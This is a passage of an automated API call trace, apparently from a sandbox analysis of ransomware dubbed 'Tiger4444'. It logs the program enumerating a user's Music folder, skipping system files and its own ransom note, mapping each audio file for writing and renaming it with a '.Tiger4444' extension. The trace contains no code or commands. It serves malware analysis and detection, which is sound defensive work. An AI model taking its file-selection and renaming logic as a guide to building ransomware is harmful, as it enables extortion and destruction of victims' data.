(lpFileName="C:\\Users\\FD1HVy\\Music\\epqIgxA0WzcL_N3FRi.m4a" (normalized: "c:\\users\\fd1hvy\\music\\epqigxa0wzcl_n3fri.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.819] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.819] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13727240376) returned 1 [0045.819] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=49887) returned 1 [0045.819] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0045.819] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0045.819] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc5e0, lpName=0x0) returned 0x2c8 [0045.820] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc5e0) returned 0xbe0000 [0045.821] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.821] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0045.821] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.821] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0045.821] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.821] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0045.821] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.821] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0045.821] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13727412409) returned 1 [0045.821] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0045.821] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0045.821] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.822] CloseHandle (hObject=0x2c8) returned 1 [0045.822] CloseHandle (hObject=0x260) returned 1 [0045.823] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\epqIgxA0WzcL_N3FRi.m4a.Tiger4444") returned 54 [0045.823] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\epqIgxA0WzcL_N3FRi.m4a" (normalized: "c:\\users\\fd1hvy\\music\\epqigxa0wzcl_n3fri.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\epqIgxA0WzcL_N3FRi.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\epqigxa0wzcl_n3fri.m4a.tiger4444"), dwFlags=0x1) returned 1 [0045.824] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=49888 | out: Addend=0xc6f980) returned 18604560 [0045.824] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4538 [0045.824] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab83a660, ftCreationTime.dwHighDateTime=0x1d4d0a5, ftLastAccessTime.dwLowDateTime=0x7bdc7c60, ftLastAccessTime.dwHighDateTime=0x1d4caac, ftLastWriteTime.dwLowDateTime=0x7bdc7c60, ftLastWriteTime.dwHighDateTime=0x1d4caac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HuzlkTkcHCiJS8Zqd", cAlternateFileName="HUZLKT~1")) returned 1 [0045.824] lstrcmpiW (lpString1="HuzlkTkcHCiJS8Zqd", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.824] lstrcmpiW (lpString1="HuzlkTkcHCiJS8Zqd", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.824] lstrcmpiW (lpString1="HuzlkTkcHCiJS8Zqd", lpString2="Tiger4444.exe") returned -1 [0045.824] lstrcmpiW (lpString1="HuzlkTkcHCiJS8Zqd", lpString2=".") returned 1 [0045.824] lstrcmpiW (lpString1="HuzlkTkcHCiJS8Zqd", lpString2="..") returned 1 [0045.824] lstrcmpiW (lpString1="HuzlkTkcHCiJS8Zqd", lpString2="windows") returned -1 [0045.824] lstrcmpiW (lpString1="HuzlkTkcHCiJS8Zqd", lpString2="bootmgr") returned 1 [0045.824] lstrcmpiW (lpString1="HuzlkTkcHCiJS8Zqd", lpString2="pagefile.sys") returned -1 [0045.824] lstrcmpiW (lpString1="HuzlkTkcHCiJS8Zqd", lpString2="boot") returned 1 [0045.824] lstrcmpiW (lpString1="HuzlkTkcHCiJS8Zqd", lpString2="ids.txt") returned -1 [0045.824] lstrcmpiW (lpString1="HuzlkTkcHCiJS8Zqd", lpString2="NTUSER.DAT") returned -1 [0045.824] lstrcpyW (in: lpString1=0x30aead4, lpString2="HuzlkTkcHCiJS8Zqd" | out: lpString1="HuzlkTkcHCiJS8Zqd") returned="HuzlkTkcHCiJS8Zqd" [0045.824] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66440 [0045.824] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x50) returned 0xc5e610 [0045.824] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66448 | out: ListHead=0xc66828, ListEntry=0xc66448) returned 0xc66348 [0045.824] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2e78a10, ftCreationTime.dwHighDateTime=0x1d4c608, ftLastAccessTime.dwLowDateTime=0x5206b920, ftLastAccessTime.dwHighDateTime=0x1d4c62c, ftLastWriteTime.dwLowDateTime=0x5206b920, ftLastWriteTime.dwHighDateTime=0x1d4c62c, nFileSizeHigh=0x0, nFileSizeLow=0xed2d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ivAqh4BdXoB0En.m4a", cAlternateFileName="IVAQH4~1.M4A")) returned 1 [0045.824] lstrcmpiW (lpString1="ivAqh4BdXoB0En.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.825] lstrcmpiW (lpString1="ivAqh4BdXoB0En.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.825] lstrcmpiW (lpString1="ivAqh4BdXoB0En.m4a", lpString2="Tiger4444.exe") returned -1 [0045.825] lstrcmpiW (lpString1="ivAqh4BdXoB0En.m4a", lpString2=".") returned 1 [0045.825] lstrcmpiW (lpString1="ivAqh4BdXoB0En.m4a", lpString2="..") returned 1 [0045.825] lstrcmpiW (lpString1="ivAqh4BdXoB0En.m4a", lpString2="windows") returned -1 [0045.825] lstrcmpiW (lpString1="ivAqh4BdXoB0En.m4a", lpString2="bootmgr") returned 1 [0045.825] lstrcmpiW (lpString1="ivAqh4BdXoB0En.m4a", lpString2="pagefile.sys") returned -1 [0045.825] lstrcmpiW (lpString1="ivAqh4BdXoB0En.m4a", lpString2="boot") returned 1 [0045.825] lstrcmpiW (lpString1="ivAqh4BdXoB0En.m4a", lpString2="ids.txt") returned 1 [0045.825] lstrcmpiW (lpString1="ivAqh4BdXoB0En.m4a", lpString2="NTUSER.DAT") returned -1 [0045.825] lstrcpyW (in: lpString1=0x30aead4, lpString2="ivAqh4BdXoB0En.m4a" | out: lpString1="ivAqh4BdXoB0En.m4a") returned="ivAqh4BdXoB0En.m4a" [0045.825] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\ivAqh4BdXoB0En.m4a", dwFileAttributes=0x0) returned 1 [0045.825] lstrlenW (lpString="ivAqh4BdXoB0En.m4a") returned 18 [0045.825] lstrlenW (lpString="Tiger4444") returned 9 [0045.825] lstrcmpiW (lpString1="oB0En.m4a", lpString2="Tiger4444") returned -1 [0045.825] lstrlenW (lpString=".dll") returned 4 [0045.825] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0045.825] lstrlenW (lpString=".lnk") returned 4 [0045.825] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0045.825] lstrlenW (lpString=".ini") returned 4 [0045.825] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0045.825] lstrlenW (lpString=".sys") returned 4 [0045.825] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0045.825] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\ivAqh4BdXoB0En.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ivaqh4bdxob0en.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.825] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.825] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13727856804) returned 1 [0045.826] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=60717) returned 1 [0045.826] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0045.826] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc720c0 [0045.826] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf030, lpName=0x0) returned 0x2c8 [0045.826] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf030) returned 0xbe0000 [0045.827] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.827] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0045.827] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.827] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0045.827] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.828] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0045.828] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.828] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0045.828] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13728086896) returned 1 [0045.828] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0045.828] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc720c0 | out: hHeap=0xc50000) returned 1 [0045.828] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.828] CloseHandle (hObject=0x2c8) returned 1 [0045.828] CloseHandle (hObject=0x260) returned 1 [0045.832] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\ivAqh4BdXoB0En.m4a.Tiger4444") returned 50 [0045.832] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\ivAqh4BdXoB0En.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ivaqh4bdxob0en.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\ivAqh4BdXoB0En.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\ivaqh4bdxob0en.m4a.tiger4444"), dwFlags=0x1) returned 1 [0045.833] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=60720 | out: Addend=0xc6f980) returned 18654448 [0045.833] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4539 [0045.833] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13c5fcb0, ftCreationTime.dwHighDateTime=0x1d4d1c2, ftLastAccessTime.dwLowDateTime=0x5c95c010, ftLastAccessTime.dwHighDateTime=0x1d4ced9, ftLastWriteTime.dwLowDateTime=0x5c95c010, ftLastWriteTime.dwHighDateTime=0x1d4ced9, nFileSizeHigh=0x0, nFileSizeLow=0x17b4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pKN8kzf02i2Z-2YwQdYf.mp3", cAlternateFileName="PKN8KZ~1.MP3")) returned 1 [0045.833] lstrcmpiW (lpString1="pKN8kzf02i2Z-2YwQdYf.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.833] lstrcmpiW (lpString1="pKN8kzf02i2Z-2YwQdYf.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.833] lstrcmpiW (lpString1="pKN8kzf02i2Z-2YwQdYf.mp3", lpString2="Tiger4444.exe") returned -1 [0045.833] lstrcmpiW (lpString1="pKN8kzf02i2Z-2YwQdYf.mp3", lpString2=".") returned 1 [0045.833] lstrcmpiW (lpString1="pKN8kzf02i2Z-2YwQdYf.mp3", lpString2="..") returned 1 [0045.833] lstrcmpiW (lpString1="pKN8kzf02i2Z-2YwQdYf.mp3", lpString2="windows") returned -1 [0045.833] lstrcmpiW (lpString1="pKN8kzf02i2Z-2YwQdYf.mp3", lpString2="bootmgr") returned 1 [0045.833] lstrcmpiW (lpString1="pKN8kzf02i2Z-2YwQdYf.mp3", lpString2="pagefile.sys") returned 1 [0045.833] lstrcmpiW (lpString1="pKN8kzf02i2Z-2YwQdYf.mp3", lpString2="boot") returned 1 [0045.833] lstrcmpiW (lpString1="pKN8kzf02i2Z-2YwQdYf.mp3", lpString2="ids.txt") returned 1 [0045.833] lstrcmpiW (lpString1="pKN8kzf02i2Z-2YwQdYf.mp3", lpString2="NTUSER.DAT") returned 1 [0045.833] lstrcpyW (in: lpString1=0x30aead4, lpString2="pKN8kzf02i2Z-2YwQdYf.mp3" | out: lpString1="pKN8kzf02i2Z-2YwQdYf.mp3") returned="pKN8kzf02i2Z-2YwQdYf.mp3" [0045.833] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\pKN8kzf02i2Z-2YwQdYf.mp3", dwFileAttributes=0x0) returned 1 [0045.833] lstrlenW (lpString="pKN8kzf02i2Z-2YwQdYf.mp3") returned 24 [0045.833] lstrlenW (lpString="Tiger4444") returned 9 [0045.833] lstrcmpiW (lpString1="wQdYf.mp3", lpString2="Tiger4444") returned 1 [0045.834] lstrlenW (lpString=".dll") returned 4 [0045.834] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0045.834] lstrlenW (lpString=".lnk") returned 4 [0045.834] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0045.834] lstrlenW (lpString=".ini") returned 4 [0045.834] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0045.834] lstrlenW (lpString=".sys") returned 4 [0045.834] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0045.834] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\pKN8kzf02i2Z-2YwQdYf.mp3" (normalized: "c:\\users\\fd1hvy\\music\\pkn8kzf02i2z-2ywqdyf.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.834] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.834] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13728713304) returned 1 [0045.834] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=97102) returned 1 [0045.834] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0045.834] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0045.834] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17e50, lpName=0x0) returned 0x2c8 [0045.834] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17e50) returned 0xbe0000 [0045.836] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.836] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0045.836] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.836] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0045.836] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.836] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0045.836] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.836] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0045.837] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13728963133) returned 1 [0045.837] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0045.837] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0045.837] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.837] CloseHandle (hObject=0x2c8) returned 1 [0045.837] CloseHandle (hObject=0x260) returned 1 [0045.840] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\pKN8kzf02i2Z-2YwQdYf.mp3.Tiger4444") returned 56 [0045.840] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\pKN8kzf02i2Z-2YwQdYf.mp3" (normalized: "c:\\users\\fd1hvy\\music\\pkn8kzf02i2z-2ywqdyf.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\pKN8kzf02i2Z-2YwQdYf.mp3.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\pkn8kzf02i2z-2ywqdyf.mp3.tiger4444"), dwFlags=0x1) returned 1 [0045.841] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=97104 | out: Addend=0xc6f980) returned 18715168 [0045.841] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4541 [0045.841] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6700fed0, ftCreationTime.dwHighDateTime=0x1d4c6d1, ftLastAccessTime.dwLowDateTime=0x4dd5440, ftLastAccessTime.dwHighDateTime=0x1d4d579, ftLastWriteTime.dwLowDateTime=0x4dd5440, ftLastWriteTime.dwHighDateTime=0x1d4d579, nFileSizeHigh=0x0, nFileSizeLow=0x564a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XaND DoJCBA3Xf.mp3", cAlternateFileName="XANDDO~1.MP3")) returned 1 [0045.841] lstrcmpiW (lpString1="XaND DoJCBA3Xf.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.841] lstrcmpiW (lpString1="XaND DoJCBA3Xf.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.841] lstrcmpiW (lpString1="XaND DoJCBA3Xf.mp3", lpString2="Tiger4444.exe") returned 1 [0045.841] lstrcmpiW (lpString1="XaND DoJCBA3Xf.mp3", lpString2=".") returned 1 [0045.841] lstrcmpiW (lpString1="XaND DoJCBA3Xf.mp3", lpString2="..") returned 1 [0045.841] lstrcmpiW (lpString1="XaND DoJCBA3Xf.mp3", lpString2="windows") returned 1 [0045.841] lstrcmpiW (lpString1="XaND DoJCBA3Xf.mp3", lpString2="bootmgr") returned 1 [0045.841] lstrcmpiW (lpString1="XaND DoJCBA3Xf.mp3", lpString2="pagefile.sys") returned 1 [0045.841] lstrcmpiW (lpString1="XaND DoJCBA3Xf.mp3", lpString2="boot") returned 1 [0045.841] lstrcmpiW (lpString1="XaND DoJCBA3Xf.mp3", lpString2="ids.txt") returned 1 [0045.841] lstrcmpiW (lpString1="XaND DoJCBA3Xf.mp3", lpString2="NTUSER.DAT") returned 1 [0045.841] lstrcpyW (in: lpString1=0x30aead4, lpString2="XaND DoJCBA3Xf.mp3" | out: lpString1="XaND DoJCBA3Xf.mp3") returned="XaND DoJCBA3Xf.mp3" [0045.841] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\XaND DoJCBA3Xf.mp3", dwFileAttributes=0x0) returned 1 [0045.841] lstrlenW (lpString="XaND DoJCBA3Xf.mp3") returned 18 [0045.841] lstrlenW (lpString="Tiger4444") returned 9 [0045.841] lstrcmpiW (lpString1="BA3Xf.mp3", lpString2="Tiger4444") returned -1 [0045.841] lstrlenW (lpString=".dll") returned 4 [0045.841] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0045.841] lstrlenW (lpString=".lnk") returned 4 [0045.841] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0045.841] lstrlenW (lpString=".ini") returned 4 [0045.841] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0045.841] lstrlenW (lpString=".sys") returned 4 [0045.842] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0045.842] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\XaND DoJCBA3Xf.mp3" (normalized: "c:\\users\\fd1hvy\\music\\xand dojcba3xf.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.842] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.842] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13729480845) returned 1 [0045.842] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=22090) returned 1 [0045.842] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0045.842] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0045.842] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5950, lpName=0x0) returned 0x2c8 [0045.842] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5950) returned 0xbe0000 [0045.843] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.843] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0045.843] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.843] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0045.843] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.843] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0045.843] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.843] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0045.843] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13729618792) returned 1 [0045.843] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0045.843] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0045.843] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.843] CloseHandle (hObject=0x2c8) returned 1 [0045.844] CloseHandle (hObject=0x260) returned 1 [0045.845] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\XaND DoJCBA3Xf.mp3.Tiger4444") returned 50 [0045.845] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\XaND DoJCBA3Xf.mp3" (normalized: "c:\\users\\fd1hvy\\music\\xand dojcba3xf.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\XaND DoJCBA3Xf.mp3.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\xand dojcba3xf.mp3.tiger4444"), dwFlags=0x1) returned 1 [0045.846] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=22096 | out: Addend=0xc6f980) returned 18812272 [0045.846] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4543 [0045.846] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4d50b90, ftCreationTime.dwHighDateTime=0x1d4cd42, ftLastAccessTime.dwLowDateTime=0xf95e6880, ftLastAccessTime.dwHighDateTime=0x1d4ca2d, ftLastWriteTime.dwLowDateTime=0xf95e6880, ftLastWriteTime.dwHighDateTime=0x1d4ca2d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yxGMwmgC", cAlternateFileName="")) returned 1 [0045.846] lstrcmpiW (lpString1="yxGMwmgC", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.846] lstrcmpiW (lpString1="yxGMwmgC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.846] lstrcmpiW (lpString1="yxGMwmgC", lpString2="Tiger4444.exe") returned 1 [0045.846] lstrcmpiW (lpString1="yxGMwmgC", lpString2=".") returned 1 [0045.846] lstrcmpiW (lpString1="yxGMwmgC", lpString2="..") returned 1 [0045.846] lstrcmpiW (lpString1="yxGMwmgC", lpString2="windows") returned 1 [0045.846] lstrcmpiW (lpString1="yxGMwmgC", lpString2="bootmgr") returned 1 [0045.846] lstrcmpiW (lpString1="yxGMwmgC", lpString2="pagefile.sys") returned 1 [0045.846] lstrcmpiW (lpString1="yxGMwmgC", lpString2="boot") returned 1 [0045.846] lstrcmpiW (lpString1="yxGMwmgC", lpString2="ids.txt") returned 1 [0045.846] lstrcmpiW (lpString1="yxGMwmgC", lpString2="NTUSER.DAT") returned 1 [0045.846] lstrcpyW (in: lpString1=0x30aead4, lpString2="yxGMwmgC" | out: lpString1="yxGMwmgC") returned="yxGMwmgC" [0045.846] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66620 [0045.846] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x3e) returned 0xc823d0 [0045.846] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66628 | out: ListHead=0xc66828, ListEntry=0xc66628) returned 0xc66448 [0045.846] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x220d0070, ftCreationTime.dwHighDateTime=0x1d4c885, ftLastAccessTime.dwLowDateTime=0x9ee9f350, ftLastAccessTime.dwHighDateTime=0x1d4cbd2, ftLastWriteTime.dwLowDateTime=0x9ee9f350, ftLastWriteTime.dwHighDateTime=0x1d4cbd2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, 